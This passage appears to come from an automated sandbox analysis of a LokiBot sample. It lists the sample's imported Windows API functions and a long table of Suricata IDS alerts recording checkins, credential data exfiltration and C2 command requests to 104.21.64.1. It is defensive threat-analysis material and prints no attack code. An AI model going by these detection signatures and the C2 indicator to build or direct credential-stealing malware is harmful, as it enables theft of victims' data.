ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-27T23:41:18.348276+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:18.348276+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:18.348276+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:19.121169+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:20.264637+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:20.264637+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:20.264637+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:21.010828+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:21.084508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:21.084508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:21.084508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:21.862696+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:21.867828+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49733	TCP
2025-02-27T23:41:23.021054+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:23.021054+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:23.021054+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:23.788024+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:23.793142+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49734	TCP
2025-02-27T23:41:25.175849+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:25.175849+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:25.175849+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:25.922693+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:27.083384+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:27.083384+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:27.083384+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:27.811495+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:28.974469+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:28.974469+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:28.974469+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:29.728704+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:30.900861+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:30.900861+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:30.900861+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:31.687456+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:31.692965+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49738	TCP
2025-02-27T23:41:32.867990+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:32.867990+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:32.867990+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:33.644680+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:34.795860+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:34.795860+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:34.795860+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:35.539251+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:36.673081+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:36.673081+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:36.673081+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:37.419291+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:38.584676+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:38.584676+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:38.584676+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:39.461506+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:39.466581+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49748	TCP
2025-02-27T23:41:40.628415+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:40.628415+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:40.628415+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:41.340916+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:42.497605+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:42.497605+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:42.497605+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:43.301447+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:43.306503+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49750	TCP
2025-02-27T23:41:44.459058+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:44.459058+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:44.459058+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:45.246034+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:45.251242+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49751	TCP
2025-02-27T23:41:46.424571+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:46.424571+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:46.424571+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:47.207297+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:47.212380+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49752	TCP
2025-02-27T23:41:48.380355+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:48.380355+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:48.380355+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:49.139467+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:49.144737+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49753	TCP
2025-02-27T23:41:50.303138+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:50.303138+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:50.303138+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:51.106126+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:51.157553+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49754	TCP
2025-02-27T23:41:52.384767+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:52.384767+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:52.384767+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:53.134282+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:54.315138+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:54.315138+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:54.315138+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:55.098268+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:55.103400+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49756	TCP
2025-02-27T23:41:56.282080+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:56.282080+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:56.282080+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:57.023183+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:58.153604+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:41:58.153604+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:41:58.153604+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:41:58.942971+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:41:58.951334+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49758	TCP
2025-02-27T23:42:00.113162+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:00.113162+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:00.113162+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:00.874262+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:02.089165+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:02.089165+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:02.089165+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:02.880076+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:02.885704+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49760	TCP
2025-02-27T23:42:04.029219+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:04.029219+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:04.029219+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:04.796105+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:05.961795+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:05.961795+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:05.961795+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:06.748960+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:06.756267+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49762	TCP
2025-02-27T23:42:07.905333+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:07.905333+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:07.905333+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:08.632728+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:09.784039+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:09.784039+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:09.784039+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:10.551673+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:10.557978+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49775	TCP
2025-02-27T23:42:11.709602+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:11.709602+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:11.709602+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:12.434085+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:13.644260+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:13.644260+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:13.644260+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:14.369807+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:15.759724+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:15.759724+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:15.759724+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:16.524708+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:16.529854+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49817	TCP
2025-02-27T23:42:17.703200+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:17.703200+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:17.703200+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:18.423721+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:19.576890+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:19.576890+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:19.576890+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:20.234461+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:20.249594+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49837	TCP
2025-02-27T23:42:21.436220+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:21.436220+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:21.436220+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:22.082049+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:22.087244+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49852	TCP
2025-02-27T23:42:23.237914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:23.237914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:23.237914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:24.051804+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:24.056977+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49863	TCP
2025-02-27T23:42:25.207910+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:25.207910+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:25.207910+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:25.933559+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:27.093105+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:27.093105+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:27.093105+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:27.883156+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:27.888228+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49890	TCP
2025-02-27T23:42:29.032802+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:29.032802+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:29.032802+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:29.944933+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:31.093903+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:31.093903+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:31.093903+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:31.852105+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:31.861196+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49917	TCP
2025-02-27T23:42:32.997651+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:32.997651+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:32.997651+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:34.219878+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:35.360167+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:35.360167+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:35.360167+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:36.120652+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:37.289891+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:37.289891+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:37.289891+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:38.098940+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49952	104.21.64.1	80	TCP
